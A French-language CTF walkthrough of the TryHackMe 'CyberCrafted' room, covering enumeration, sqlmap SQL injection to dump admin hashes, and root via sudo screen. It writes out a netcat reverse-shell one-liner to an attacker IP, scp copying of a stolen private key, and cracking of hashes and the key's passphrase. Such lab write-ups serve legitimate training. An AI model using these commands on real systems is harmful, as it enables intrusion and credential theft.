CyberCrafted Walkthrough Fr | TryHackMe – Write-up

Pwn this pay-to-win Minecraft server!

 

CyberCrafted est un CTF de  TryHackMe. De niveau moyen, il nécessite un dénombrement assez poussé. Il reste accessible même pour les débutants. L’escalade des privilèges est plutôt sympa.

 

  • Français
  • English

Buy Me a Coffee

Enumération

Commande :

nmap -T5  10.10.235.114

3 ports sont ouverts SSH, HTTP, et le port 25565 qui héberge le jeu Minecraft

Web énumération

dirsearch  -u 10.10.181.45

 

Dirsearch nous donne le nom de domaine du site web : http://cybercrafted.thm/

Ajout du nom de domaine dans le fichier hosts.

echo ‘10.10.181.45    cybercrafted.thm’  >> /etc/hosts

Sub-domains enumeration :

Commande :

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H « Host: FUZZ.cybercrafted.thm/ » -u http://cybercrafted.thm/ -fs 0

Il existe trois sous-domaines pour lesquels il faut faire une énumération avec dirsearch. Auparavant, il faut les rajouter dans le fichier hosts.

Enumération sur vhost ( store et admin ) :

Commande :

dirsearch -u http://admin.cybercrafted.thm/

Le site http://admin.cybercrafted.thm/login.php, demande des identifiants que nous n’avons pas. De plus, l’accès ne semble pas être vulnérable. ( pas de bypass authentication )

Sur le site http://store.cybercrafted.thm/search.php , nous avons la possibilité d’effectuer une recherche. Cette page est vulnérable à l’injection sql ( slqi ).

Pour l’effectuer de manière automatique, il faut intercepter la requête d’une recherche dans BurpSuite. Une fois interceptée, il faut l’enregistrer et l’utiliser dans sqlmap.

Commande initiale pour tester la vulnérabilité :

sqlmap -r req.req

Commande finale ( dump des identifiants ) :

sqlmap -r req.req –dbms=mysql -D webapp -T admin –dump

En copiant le hash sur le site https://crackstation.net/ nous obtenons le mot de passe.

Accès au site admin.cybercrafted.thm/login.php

Sur le site, nous avons la possibilité d’entrer des commandes.

Commande :

id

Acces initial :

Dans la mesure où on peut passer des commandes système, il est probable que l’on peut obtenir un reverse_shell.

Commande :

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 10.11.38.124 1234 > f

Mouvement latéral www-data- xXUltimateCreeperXx

Une fois le reverse_shell reçu sur nc, on se trouve avec le compte www-data. Dans le dossier /home se trouve le compte xXUltimateCreeperXx, dans lequel une magnigfique clé privée id_rsa est présente.

Commande :

ssh xXUltimateCreeperXx@127.0.0.1 -i id_rsa

La clé privée est chiffrée par une passphrase. Pour la déchiffrer, il faut utiliser ssh2john. Avant, nous allons la copier en local sur kali.

Commande :

scp id_rsa root@10.11.38.124:/root/trytohackme/cybercraft/

Commande pour cracker la clé : 

ssh2john id_rsa > id_rsa.hash

john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt

Mouvement latéral xXUltimateCreeperXx - cybercrafted

Une fois sur le compte de xXUltimateCreeperXx et aux vues des questions posées par tryhackme, il faut trouver l’emplacement du jeu Minecraft.

Il se trouve dans /opt ( rien de bien sorcier )

Après énumération des sous-dossiers et fichiers, le mot de passe du compte cybercrafted se trouve dans le chemin suivant /opt/minecraft/cybercrafted/plugins/LoginSystem/log.txt

Commande pour basculer sur le compte de cybercrafted :

su cybercrafted

Escalade de Privilège :

1ier commande à effectuer : 

sudo -l

 

L’utilisateur a des droits root  pour exécuter la commande /usr/bin/screen -r cybercrafted

Commande

sudo /usr/bin/screen -r cybercrafted

on arrive sur cette fenêtre :

 

Pour basculer sur le compte root, il faut faire ces raccourcis clavier.

crtl a puis faire ctrl c

#

That’s all folks

Merci d’avoir pris la peine de venir sur le site de lire ce Write Up

J’espère qu’il vous a plus et qu’il vous apprit des nouvelles choses.

N’hésitez pas à laisse un commentaire ou à partager cet article. 

Facebook
Twitter
LinkedIn
Pinterest